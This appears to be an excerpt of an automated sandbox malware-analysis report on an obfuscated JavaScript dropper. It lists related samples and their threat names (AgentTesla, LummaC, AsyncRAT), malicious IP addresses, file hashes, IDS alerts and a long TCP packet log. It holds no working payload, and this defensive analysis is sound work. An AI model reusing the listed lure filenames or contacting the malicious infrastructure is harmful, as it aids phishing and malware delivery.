	172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	RFQ448903423_MAT_HASUE_de_Mexico.js	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	bat.bat	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer, XWorm, zgRAT	Browse	185.230.212.169
	File.com.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	185.230.212.164
	https://forms.zohopublic.eu/oyika/form/OfficeAdministration/formperma/9Y9iItPBjtbizq-LjIqfCLG9lgQgDpYgginS586dnzM	Get hash	malicious	Unknown	Browse	89.36.170.147
	http://workdrive.zohoexternal.com	Get hash	malicious	Unknown	Browse	89.36.170.147
	https://workdrive.zohoexternal.com/external/writer/46fdf68b2f78265d07797e09c63aeef4064c3374cfc014062660688cb6876b9b	Get hash	malicious	Unknown	Browse	89.36.170.147
	https://diverescueintl.com/	Get hash	malicious	HTMLPhisher	Browse	89.36.170.147
	3533cdbe-ace4-ee24-ff8f-a6fbfe7cf297.eml	Get hash	malicious	HTMLPhisher	Browse	89.36.170.147
TUT-ASUS	inv-lista de embalaje de env#U00edo 08-29.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	OFFER-INQUIRY.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	adbce.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	208.95.112.1
	dlmgr.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	208.95.112.1
	REVISED PI.PDF.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	NEW ORDER.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Orden de compra.000854657689654253545676785436.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	00_datos de la transacci#U00f3n rechazada y n#U00famero de cuenta incorrecto.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	1.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse	78.142.208.13
	vwAGeX1bR4.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	uV7ttrc7wN.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	064c59b3a8b03e6c733f88483fd675d99bc805399c55d4a1a7b613aa20d08de8_dump.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	43q1wNs9CA.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	XSy5QvnuYn.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	YK85paB4RW.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	E6YUQ1pon1.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	D0XKEnHabJ.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	82HD7ZgYPA.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Feature Status Update 3RLSM.html	Get hash	malicious	Unknown	Browse	78.142.208.13 207.241.227.86
	ZrpwHieO7K.lnk	Get hash	malicious	MalLnk	Browse	78.142.208.13 207.241.227.86
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	78.142.208.13 207.241.227.86
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	78.142.208.13 207.241.227.86
	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse	78.142.208.13 207.241.227.86
	DHL STATEMENT OF ACCOUNT - 30082024.exe	Get hash	malicious	GuLoader	Browse	78.142.208.13 207.241.227.86
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	78.142.208.13 207.241.227.86
	DHL Page1.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	78.142.208.13 207.241.227.86
	SWIFT COPIES.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	78.142.208.13 207.241.227.86
	SI_56127.vbs	Get hash	malicious	Remcos	Browse	78.142.208.13 207.241.227.86

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nllluld4Jt/Z:NllU6j
MD5:	745E05B9A9795FA48B7E42C8C025B9FA
SHA1:	A3C346B741ACC27369A4AF25CAEB45BC874F0F58
SHA-256:	B6AF71FFBBE45D8F8F3503C329FBA2EE8EF16307C16979260662355E014E4501
SHA-512:	9783934689D83CD7A99F306A149B2240B7200C1E1A9B951A51EBC12909A68786189A3412FA62BBB27B7E0F3B013FD4D111C5CB9E1791C0BAF8779B95C6280F62
Malicious:	false
Reputation:	low
Preview:	@...e.................................L..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2galabz2.wqr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lliqdzx1.2rq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqr03okw.j0s.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqt2f2g2.wq0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with very long lines (411), with CRLF line terminators
Entropy (8bit):	3.6980370046721123
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js
File size:	1'346'674 bytes
MD5:	e4b82b3738d246e3734ac96ac87dc0e8
SHA1:	34e616d4a1ddeb444b43af44ef5a89fe40200c51
SHA256:	c95e9d8f6e53233a7c10c496b19a66858c52c013d426f3d566ae978071a4dce6
SHA512:	b1661e2a709d39d32e653ef710651c40e346f31395cdd8af051823d926f2ad7c056bfc49a9fadf619ec6010ac0d2689f1e72f52283b8ea175175470318bb1133
SSDEEP:	24576:B8m8Dz4AcillXWZvFckYsCFnZclMBznPJicAPD:jgArzcbsCFnZj7JicAPD
TLSH:	E055D61035EAB05CF1F32FA357ED65EA8FABB5722A56552E7004030B4A62EC0CE55B73
File Content Preview:	.. .v.a.r. .b.W.p.U.L.i.L.L.A.N.W.q.L.S.N.h.c.q.i.u.U.K.K.n.G.W.W.P.W.R.L.p.n.a.Z.A.e.c.N.j.T.Z.L.u.c.W.U.o.i.K.d.L.B.d.i.d.J.L.P.i.W.a.B.p.m.h.p.f.l.h.i.L.n.L.U.u.W.j.b.A.a.W.i.d.L.W.n.c.A.C.i.L.T.r.N.f.W.N.e.z.W.d.b.x.b.B.K.Z.c.K.o.b.x.U.A.o.R.o.g.W.b.m

File Icon


Icon Hash:	68d69b8bb6aa9a86

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-30T10:38:57.090961+0200	TCP	2049038	ET MALWARE Malicious Base64 Encoded Payload In Image	1	443	49705	207.241.227.86	192.168.2.8
2024-08-30T10:38:59.354996+0200	TCP	2020423	ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1	1	443	49706	78.142.208.13	192.168.2.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2024 10:38:54.730803967 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:54.730864048 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:54.730957985 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:54.740134954 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:54.740165949 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.350797892 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.350879908 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.358208895 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.358253956 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.358601093 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.374042034 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.420506001 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.637495041 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.637531042 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.637547016 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.637588024 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.637619019 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.637639999 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.637666941 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.667337894 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.667354107 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.667443037 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.667471886 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.667510986 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.703290939 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.703309059 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.703396082 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.703429937 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.703469992 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.756915092 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.756936073 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.757041931 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.757077932 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.757122040 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.758702040 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.758718014 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.758778095 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.758795977 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.758819103 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.758830070 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.793817043 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.793840885 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.793963909 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.793991089 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.794034004 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.847714901 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.847734928 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.847856045 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.847886086 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.847923994 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.848067999 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.848083973 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.848130941 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.848138094 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.848167896 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.849790096 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.849812031 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.849852085 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.849867105 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.849890947 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.849905014 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.850831985 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.850847960 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.850898027 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.850905895 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.850941896 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.853744984 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.853777885 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.853816032 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.853826046 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.853837013 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.853857994 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.873487949 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.884702921 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.884721994 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.884818077 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.884843111 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.884882927 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.909063101 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.909086943 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.909168959 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.909198999 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.909223080 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.909252882 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.909367085 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.909367085 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.909367085 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.909367085 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.909379959 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.909415960 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.938273907 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.938288927 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.938406944 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.938436031 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.938483000 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.938788891 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.938805103 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.938844919 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.938853025 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.938883066 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.938903093 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.939321041 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.939337969 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.939376116 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.939384937 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.939410925 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.939431906 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.939886093 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.939902067 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.939944029 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.939951897 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.939980984 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.940005064 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.942989111 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.943007946 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.943054914 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.943070889 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.943089962 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.943110943 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.975162983 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.975183010 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.975291967 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.975316048 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.975359917 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.999799967 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.999819994 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.999917984 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.999948978 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:55.999970913 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:55.999983072 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.000051975 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.000076056 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.000101089 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.000108004 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.000130892 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.000149012 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.028966904 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.028986931 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.029154062 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.029182911 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.029238939 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.029283047 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.029304028 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.029371023 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.029378891 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.029583931 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.029584885 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.029596090 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.029624939 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.029692888 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.029701948 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.029715061 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.029768944 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.030004025 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.030020952 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.030082941 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.030087948 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.030131102 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.030291080 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.030313015 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.030349016 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.030356884 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.030384064 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.030401945 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.065835953 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.065857887 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.065918922 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.065948009 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.065967083 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.065987110 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.090600014 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.090621948 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.090720892 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.090749025 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.090770006 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.090790987 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.090799093 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.090820074 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.090821981 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.090857983 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.119637012 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.119654894 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.119798899 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.119832039 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.119885921 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.120042086 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.120057106 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.120121956 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.120130062 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.120163918 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.120351076 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.120372057 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.120402098 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.120409012 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.120428085 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.120445013 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.120655060 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.120671034 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.120704889 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.120711088 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.120732069 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.120750904 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.120953083 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.120965958 CEST	443	49705	207.241.227.86	192.168.2.8
Aug 30, 2024 10:38:56.121001959 CEST	49705	443	192.168.2.8	207.241.227.86
Aug 30, 2024 10:38:56.121012926 CEST	443	49705	207.241.227.86	192.168.2.8
